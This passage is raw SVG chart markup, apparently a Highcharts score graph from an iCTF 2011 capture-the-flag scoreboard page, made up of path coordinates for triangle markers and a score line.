Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 243 254.32 L 239 246.32 247 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 241 254.32 L 237 246.32 245 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 239 254.32 L 235 246.32 243 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 237 254.32 L 233 246.32 241 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 235 254.32 L 231 246.32 239 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 233 254.32 L 229 246.32 237 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 231 254.32 L 227 246.32 235 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 229 254.32 L 225 246.32 233 246.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 227 256.82 L 223 248.82 231 248.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 225 257.32 L 221 249.32 229 249.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 223 258.32 L 219 250.32 227 250.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 221 258.32 L 217 250.32 225 250.32 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 258.82 L 215.5 250.82 223.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 258.82 L 213.5 250.82 221.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 258.82 L 211.5 250.82 219.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 258.82 L 209.5 250.82 217.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 258.82 L 207.5 250.82 215.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 258.82 L 205.5 250.82 213.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 258.82 L 203.5 250.82 211.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 258.82 L 201.5 250.82 209.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 258.82 L 199.5 250.82 207.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 258.82 L 197.5 250.82 205.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 258.82 L 195.5 250.82 203.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 258.82 L 193.5 250.82 201.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 258.82 L 191.5 250.82 199.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 258.82 L 189.5 250.82 197.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 258.82 L 187.5 250.82 195.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 258.82 L 185.5 250.82 193.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 258.82 L 183.5 250.82 191.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 258.82 L 181.5 250.82 189.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 258.82 L 179.5 250.82 187.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 258.82 L 177.5 250.82 185.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 258.82 L 175.5 250.82 183.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 178 258.82 L 174 250.82 182 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 176 258.82 L 172 250.82 180 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 174 258.82 L 170 250.82 178 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 172 258.82 L 168 250.82 176 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 170 258.82 L 166 250.82 174 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 168 258.82 L 164 250.82 172 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 166 258.82 L 162 250.82 170 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 164 258.82 L 160 250.82 168 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 162 258.82 L 158 250.82 166 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 160 258.82 L 156 250.82 164 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 158 258.82 L 154 250.82 162 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 156 258.82 L 152 250.82 160 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 154 258.82 L 150 250.82 158 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 152 258.82 L 148 250.82 156 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 150 258.82 L 146 250.82 154 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 148 258.82 L 144 250.82 152 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 146 258.82 L 142 250.82 150 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 144 258.82 L 140 250.82 148 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 142 258.82 L 138 250.82 146 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 140 258.82 L 136 250.82 144 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 258.82 L 134.5 250.82 142.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 258.82 L 132.5 250.82 140.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 258.82 L 130.5 250.82 138.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 258.82 L 128.5 250.82 136.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 258.82 L 126.5 250.82 134.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 258.82 L 124.5 250.82 132.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 258.82 L 122.5 250.82 130.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 258.82 L 120.5 250.82 128.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 258.82 L 118.5 250.82 126.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 258.82 L 116.5 250.82 124.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 258.82 L 114.5 250.82 122.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 258.82 L 112.5 250.82 120.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 258.82 L 110.5 250.82 118.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 258.82 L 108.5 250.82 116.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 258.82 L 106.5 250.82 114.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 258.82 L 104.5 250.82 112.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 258.82 L 102.5 250.82 110.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 258.82 L 100.5 250.82 108.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 258.82 L 98.5 250.82 106.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 258.82 L 96.5 250.82 104.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 258.82 L 94.5 250.82 102.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 97 258.82 L 93 250.82 101 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 95 258.82 L 91 250.82 99 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 93 258.82 L 89 250.82 97 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 91 258.82 L 87 250.82 95 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 89 258.82 L 85 250.82 93 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 87 258.82 L 83 250.82 91 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 85 258.82 L 81 250.82 89 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 83 258.82 L 79 250.82 87 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 81 258.82 L 77 250.82 85 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 79 258.82 L 75 250.82 83 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 77 258.82 L 73 250.82 81 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 75 258.82 L 71 250.82 79 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 73 258.82 L 69 250.82 77 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 71 258.82 L 67 250.82 75 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 69 258.82 L 65 250.82 73 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 67 258.82 L 63 250.82 71 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 65 258.82 L 61 250.82 69 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 63 258.82 L 59 250.82 67 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 61 258.82 L 57 250.82 65 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 59 258.82 L 55 250.82 63 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 258.82 L 53.5 250.82 61.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 258.82 L 51.5 250.82 59.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 258.82 L 49.5 250.82 57.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 258.82 L 47.5 250.82 55.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 258.82 L 45.5 250.82 53.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 258.82 L 43.5 250.82 51.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 258.82 L 41.5 250.82 49.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 258.82 L 39.5 250.82 47.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 258.82 L 37.5 250.82 45.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 258.82 L 35.5 250.82 43.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 258.82 L 33.5 250.82 41.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 258.82 L 31.5 250.82 39.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 258.82 L 29.5 250.82 37.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 258.82 L 27.5 250.82 35.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 29.5 258.82 L 25.5 250.82 33.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 258.82 L 23.5 250.82 31.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 258.82 L 21.5 250.82 29.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 258.82 L 19.5 250.82 27.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 258.82 L 17.5 250.82 25.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 258.82 L 15.5 250.82 23.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 258.82 L 13.5 250.82 21.5 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 16 258.82 L 12 250.82 20 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 14 258.82 L 10 250.82 18 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 12 258.82 L 8 250.82 16 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 10 258.82 L 6 250.82 14 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 8 258.82 L 4 250.82 12 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 6 258.82 L 2 250.82 10 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path><path d="M 4 258.82 L 0 250.82 8 250.82 Z" fill="#aaeeee" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.67094624 L 173.81669637551994 253.67094624 L 175.79233511586455 253.67094624 L 177.76797385620918 253.67094624 L 179.74361259655382 253.59960178285715 L 181.71925133689842 253.59960178285715 L 183.69489007724306 253.59960178285715 L 185.67052881758767 253.59960178285715 L 187.6461675579323 253.59960178285715 L 189.6218062982769 253.59960178285715 L 191.59744503862154 253.59960178285715 L 193.57308377896615 253.59960178285715 L 195.5487225193108 253.59960178285715 L 197.52436125965542 253.59960178285715 L 199.50000000000003 253.59960178285715 L 201.47563874034466 251.81852749714284 L 203.45127748068927 251.81852749714284 L 205.4269162210339 251.81852749714284 L 207.4025549613785 249.76778537142857 L 209.37819370172315 249.76778537142857 L 211.35383244206778 249.76778537142857 L 213.3294711824124 247.78257257142857 L 215.30510992275703 244.52000982857143 L 217.28074866310163 242.13382697142856 L 219.25638740344627 238.89922354285716 L 221.23202614379088 236.19970354285715 L 223.2076648841355 232.00580639999998 L 225.18330362448012 229.18369165714284 L 227.15894236482475 229.18369165714284 L 229.1345811051694 229.18369165714284 L 231.110219845514 225.49138765714287 L 233.08585858585863 222.84007337142856 L 235.06149732620324 222.84007337142856 L 237.03713606654787 222.84007337142856 L 239.01277480689248 222.84007337142856 L 240.98841354723712 222.84007337142856 L 242.96405228758175 222.84007337142856 L 244.93969102792636 222.84007337142856 L 246.915329768271 222.84007337142856 L 248.8909685086156 222.84007337142856 L 250.86660724896024 222.84007337142856 L 252.84224598930484 222.84007337142856 L 254.81788472964945 222.84007337142856 L 256.79352346999406 222.84007337142856 L 258.7691622103387 222.84007337142856 L 260.7448009506833 222.84007337142856 L 262.72043969102793 222.84007337142856 L 264.69607843137254 222.84007337142856 L 266.6717171717172 222.84007337142856 L 268.6473559120618 222.84007337142856 L 270.6229946524064 222.84007337142856 L 272.598633392751 222.84007337142856 L 274.5742721330957 222.84007337142856 L 276.5499108734403 222.84007337142856 L 278.5255496137849 222.84007337142856 L 280.50118835412957 222.84007337142856 L 282.4768270944742 222.84007337142856 L 284.4524658348188 222.84007337142856 L 286.4281045751634 222.84007337142856 L 288.40374331550805 222.84007337142856 L 290.37938205585266 222.3233081142857 L 292.35502079619727 218.68215291428572 L 294.33065953654193 216.05976205714285 L 296.30629827688654 216.05976205714285 L 298.28193701723114 216.05976205714285 L 300.25757575757575 216.05976205714285 L 302.2332144979204 216.05976205714285 L 304.208853238265 216.05976205714285 L 306.1844919786096 216.05976205714285 L 308.1601307189543 216.05976205714285 L 310.1357694592989 216.05976205714285 L 312.1114081996435 216.05976205714285 L 314.0870469399881 216.05976205714285 L 316.0626856803328 214.66358925714286 L 318.0383244206774 212.95023977142858 L 320.013963161022 212.11670377142858 L 321.98960190136665 210.39279977142857 L 323.96524064171126 208.80962262857142 L 325.94087938205587 208.14216236190396 L 327.9165181224005 206.58029721904683 L 329.89215686274514 204.08420533333253 L 331.86779560308975 204.08420533333253 L 333.84343434343435 204.08420533333253 L 335.81907308377896 204.08420533333253 L 337.7947118241236 204.08420533333253 L 339.77035056446823 204.08420533333253 L 341.74598930481284 204.08420533333253 L 343.7216280451575 204.08420533333253 L 345.6972667855021 204.08420533333253 L 347.6729055258467 204.08420533333253 L 349.6485442661913 204.08420533333253 L 351.624183006536 204.08420533333253 L 353.5998217468806 204.08420533333253 L 355.5754604872252 204.08420533333253 L 357.55109922756986 203.41437481142773 L 359.52673796791447 202.979001097142 L 361.5023767082591 202.91611378285629 L 363.4780154486037 202.78322951618966 L 365.45365418894835 202.78322951618966 L 367.42929292929296 202.78322951618966 L 369.40493166963756 202.78322951618966 L 371.3805704099822 202.78322951618966 L 373.35620915032683 202.78322951618966 L 375.33184789067144 202.78322951618966 L 377.30748663101605 202.78322951618966 L 379.2831253713607 202.78322951618966 L 381.2587641117053 202.71848163047542 L 383.2344028520499 202.66020853333254 L 385.2100415923946 202.21285950476113 L 387.1856803327392 201.68117584761825 L 389.1613190730838 201.0676947047611 L 391.1369578134284 200.80870316190396 L 393.1125965537731 200.71225113904683 L 395.0882352941177 200.56906156190382" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.67094624 L 173.81669637551994 253.67094624 L 175.79233511586455 253.67094624 L 177.76797385620918 253.67094624 L 179.74361259655382 253.59960178285715 L 181.71925133689842 253.59960178285715 L 183.69489007724306 253.59960178285715 L 185.67052881758767 253.59960178285715 L 187.6461675579323 253.59960178285715 L 189.6218062982769 253.59960178285715 L 191.59744503862154 253.59960178285715 L 193.57308377896615 253.59960178285715 L 195.5487225193108 253.59960178285715 L 197.52436125965542 253.59960178285715 L 199.50000000000003 253.59960178285715 L 201.47563874034466 251.81852749714284 L 203.45127748068927 251.81852749714284 L 205.4269162210339 251.81852749714284 L 207.4025549613785 249.76778537142857 L 209.37819370172315 249.76778537142857 L 211.35383244206778 249.76778537142857 L 213.3294711824124 247.78257257142857 L 215.30510992275703 244.52000982857143 L 217.28074866310163 242.13382697142856 L 219.25638740344627 238.89922354285716 L 221.23202614379088 236.19970354285715 L 223.2076648841355 232.00580639999998 L 225.18330362448012 229.18369165714284 L 227.15894236482475 229.18369165714284 L 229.1345811051694 229.18369165714284 L 231.110219845514 225.49138765714287 L 233.08585858585863 222.84007337142856 L 235.06149732620324 222.84007337142856 L 237.03713606654787 222.84007337142856 L 239.01277480689248 222.84007337142856 L 240.98841354723712 222.84007337142856 L 242.96405228758175 222.84007337142856 L 244.93969102792636 222.84007337142856 L 246.915329768271 222.84007337142856 L 248.8909685086156 222.84007337142856 L 250.86660724896024 222.84007337142856 L 252.84224598930484 222.84007337142856 L 254.81788472964945 222.84007337142856 L 256.79352346999406 222.84007337142856 L 258.7691622103387 222.84007337142856 L 260.7448009506833 222.84007337142856 L 262.72043969102793 222.84007337142856 L 264.69607843137254 222.84007337142856 L 266.6717171717172 222.84007337142856 L 268.6473559120618 222.84007337142856 L 270.6229946524064 222.84007337142856 L 272.598633392751 222.84007337142856 L 274.5742721330957 222.84007337142856 L 276.5499108734403 222.84007337142856 L 278.5255496137849 222.84007337142856 L 280.50118835412957 222.84007337142856 L 282.4768270944742 222.84007337142856 L 284.4524658348188 222.84007337142856 L 286.4281045751634 222.84007337142856 L 288.40374331550805 222.84007337142856 L 290.37938205585266 222.3233081142857 L 292.35502079619727 218.68215291428572 L 294.33065953654193 216.05976205714285 L 296.30629827688654 216.05976205714285 L 298.28193701723114 216.05976205714285 L 300.25757575757575 216.05976205714285 L 302.2332144979204 216.05976205714285 L 304.208853238265 216.05976205714285 L 306.1844919786096 216.05976205714285 L 308.1601307189543 216.05976205714285 L 310.1357694592989 216.05976205714285 L 312.1114081996435 216.05976205714285 L 314.0870469399881 216.05976205714285 L 316.0626856803328 214.66358925714286 L 318.0383244206774 212.95023977142858 L 320.013963161022 212.11670377142858 L 321.98960190136665 210.39279977142857 L 323.96524064171126 208.80962262857142 L 325.94087938205587 208.14216236190396 L 327.9165181224005 206.58029721904683 L 329.89215686274514 204.08420533333253 L 331.86779560308975 204.08420533333253 L 333.84343434343435 204.08420533333253 L 335.81907308377896 204.08420533333253 L 337.7947118241236 204.08420533333253 L 339.77035056446823 204.08420533333253 L 341.74598930481284 204.08420533333253 L 343.7216280451575 204.08420533333253 L 345.6972667855021 204.08420533333253 L 347.6729055258467 204.08420533333253 L 349.6485442661913 204.08420533333253 L 351.624183006536 204.08420533333253 L 353.5998217468806 204.08420533333253 L 355.5754604872252 204.08420533333253 L 357.55109922756986 203.41437481142773 L 359.52673796791447 202.979001097142 L 361.5023767082591 202.91611378285629 L 363.4780154486037 202.78322951618966 L 365.45365418894835 202.78322951618966 L 367.42929292929296 202.78322951618966 L 369.40493166963756 202.78322951618966 L 371.3805704099822 202.78322951618966 L 373.35620915032683 202.78322951618966 L 375.33184789067144 202.78322951618966 L 377.30748663101605 202.78322951618966 L 379.2831253713607 202.78322951618966 L 381.2587641117053 202.71848163047542 L 383.2344028520499 202.66020853333254 L 385.2100415923946 202.21285950476113 L 387.1856803327392 201.68117584761825 L 389.1613190730838 201.0676947047611 L 391.1369578134284 200.80870316190396 L 393.1125965537731 200.71225113904683 L 395.0882352941177 200.56906156190382" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 